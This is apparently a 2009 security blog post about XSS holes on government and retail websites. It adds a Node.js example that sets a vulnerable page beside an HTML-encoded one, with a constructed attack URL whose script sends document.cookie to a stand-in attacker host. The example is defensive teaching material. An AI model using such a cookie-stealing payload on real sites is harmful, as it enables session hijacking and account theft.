Thursday, January 22, 2009

FBI, CIA and NSA websites susceptible to XSS attacks.

The cross-site scripting (XSS) archive xssed.com is reporting that government websites including FBI.gov, CIA.gov and NSA.gov are vulnerable to XSS attacks found by independent researchers. Cross-site scripting is not new: it has been known since around 2000, and numerous trainings, presentations and books have covered it since, yet, like SQL injection, it is still everywhere, and hundreds of thousands of websites remain vulnerable to it. Flaws of this kind have been used to build convincing phishing attacks and to deliver browser exploits. Besides stealing cookies and launching JavaScript exploits, one of the most effective uses of such a flaw is impersonation: the injected script runs under the legitimate site's own domain, so nothing in the browser's address bar looks wrong to the victim.

A host of other high-profile websites are affected by cross-site scripting vulnerabilities, including nasa.gov, walmart.com, bestbuy.com and cnet.com. The headline of this post names government agencies because people trust them the most, and yet their websites are vulnerable to such common flaws. As a security researcher I understand that practically no piece of code is completely secure, but the time it takes to patch such holes should be taken as a measure of how seriously a security agency treats the problem. The FBI.gov XSS flaw was reported on 9 January and is still not patched as of 22 January, which suggests either that they do not know about it or that they are not serious about fixing such issues. Whatever the case, this post is to warn users to be cautious: a legitimate domain in your browser's address bar can still end up delivering malicious software to your computer.
One precaution you can take is to install NoScript in Firefox, which pretty much all security professionals use nowadays; for IE users, I suggest switching to Mozilla Firefox. Keep in mind that this only protects your own browser. The real fix belongs on the server: every user-supplied value has to be encoded for the HTML context it is written into before it is reflected back into the page.
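To make the mechanism concrete, here is an added example (my own illustration, not code from the original post or from any of the sites named above) of a reflected XSS flaw beside its fix. A "search results" page echoes the `q` parameter back into the HTML; the vulnerable version concatenates it raw, the hardened version HTML-encodes it first. The host `www.example.gov`, the attacker host `attacker.invalid`, the `q` parameter and the cookie-stealing payload are all constructed for this example.

```javascript
// Added example (not from the original post): reflected XSS in Node.js.
// Everything here, including the URL, the parameter name and the payload,
// is constructed for illustration.

// HTML-encode a string for insertion as element text (or a quoted attribute).
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the user-supplied query is reflected verbatim into the page,
// so a <script> element in it becomes part of the served document.
function renderVulnerable(query) {
  return `<html><body><h1>Results for: ${query}</h1></body></html>`;
}

// Hardened: the same page, but the query is encoded for the element-text
// context it lands in, so "<script>" is shown as text rather than executed.
function renderHardened(query) {
  return `<html><body><h1>Results for: ${escapeHtml(query)}</h1></body></html>`;
}

// Extract a query parameter from a request URL the way a server would.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) ?? '';
}

// Crude detector for this payload's fingerprint: a literal <script> element
// present in the rendered markup.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed attacker link: a trusted-looking host carrying a payload that
// ships the victim's cookies to an attacker-controlled host. The victim sees
// only www.example.gov in the address bar.
const ATTACK_URL =
  'https://www.example.gov/search?q=' +
  encodeURIComponent(
    "<script>new Image().src='https://attacker.invalid/c?'+document.cookie</script>"
  );

// Render the attacker's URL through both versions of the page.
function demo() {
  const q = queryParam(ATTACK_URL, 'q');
  return {
    query: q,
    vulnerable: renderVulnerable(q),
    hardened: renderHardened(q),
  };
}

const result = demo();
console.log('vulnerable page carries executable payload:', containsScriptTag(result.vulnerable));
console.log('hardened page carries executable payload:  ', containsScriptTag(result.hardened));
console.log(result.hardened);
```

Run it with `node` and compare the two rendered pages. Two caveats: encoding is context-specific, so a value written into a JavaScript block, a URL or an event-handler attribute needs encoding for that context rather than the element-text encoding shown here; and marking session cookies `HttpOnly` blocks this particular cookie-theft payload but does nothing against the phishing and browser-exploit uses of the same flaw.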
